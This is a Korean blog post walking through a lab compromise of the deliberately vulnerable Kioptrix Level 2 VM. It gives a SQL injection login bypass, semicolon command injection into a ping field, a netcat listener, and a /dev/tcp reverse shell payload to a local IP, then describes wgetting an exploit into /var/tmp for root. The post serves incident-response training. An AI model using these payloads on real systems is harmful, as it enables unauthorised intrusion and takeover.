반응형

Kioptrix Level 2를 이용하여 간단한 침해사고 발생 실습


Kioptrix Level 2를 이용하여 간단히 침해사고를 일으켜 보는 실습을 해볼 것이다.




먼저 Kioptrix Level2 이미지를 구하여 가상머신에 올린다. 
위의 ip주소가 나와야 한다.




그리고 위의 ip주소로 브라우져에서 실행하면 위의 화면이 나오는 것을 알 수 있다.
여기선 sql injection이 된다.


admin // 1 'or' 1=1 --




sql이 제대로 되었다면 위의 화면이 뜨는 것을 확인 할 수 있다.
저 빈칸은 ping명령어가 적용되고 세미콜론(;)을 통하여 다중 명령이 가능하게 된다.








다양한 명령어를 통하여 서버에 대한 정보를 유추할 수 있다. 




이제 로컬로 돌아와서 리버스 커넥션을 위하여 준비를 해보자.
nc.exe -lvvp 4444
l = listen
vv = 상세히
p = port 



8.8.8.8; /bin/sh 0</dev/tcp/192.168.56.1/4444 1>&0 2>&0
다시 브라우저로 돌아와서 위의 명령어를 입력한다. ip같은경우 로컬 ipconfig에서 host-only network이다.

0번은 표준입력방식이며 키보드 방식이다. 1은 출력 2는 표준출력 에러표시이다. 이 명령어로써
리버스 커넥션이 된다.




아까전에 listen하고 있던 곳에서 연결이 된 것을 확인 할 수 있고 명령어도 먹힌다.




이제 리버스 커넥션한것으로 공격코드를 올려보기 위해 wget을 이용하여 다운로드를 해보자.
하지만 마지막줄에 보듯이 퍼미션 디나이가 뜨는 것을 알 수 있다. 나름 권한체크를 하고 있는 듯하다.




보통 /var/tmp에는 누구든지 쓸 수 있는 권한이 적용되어 있을 가능성이 매우 높다(sticky bit)
따라서 여기서 wget을 이용하여 올린다.



익스플로잇 코드를 통하여 권한이 상승된 것을 확인 할 수 있으며
이 서버는 이제 공격자의 손아귀에 들어오게 됐다.


위의 실습을 통해 간단히 침해사고를 일으켜 보았고 다음 포스팅에는 
원격으로 침해사고 당한 서버를 루트킷으로 간단히 검사해보고 디스크 이미지를 덤프뜨는 것을 해보겠다. 

반응형
  • 네이버 블러그 공유하기
  • 네이버 밴드에 공유하기
  • 페이스북 공유하기
  • 카카오스토리 공유하기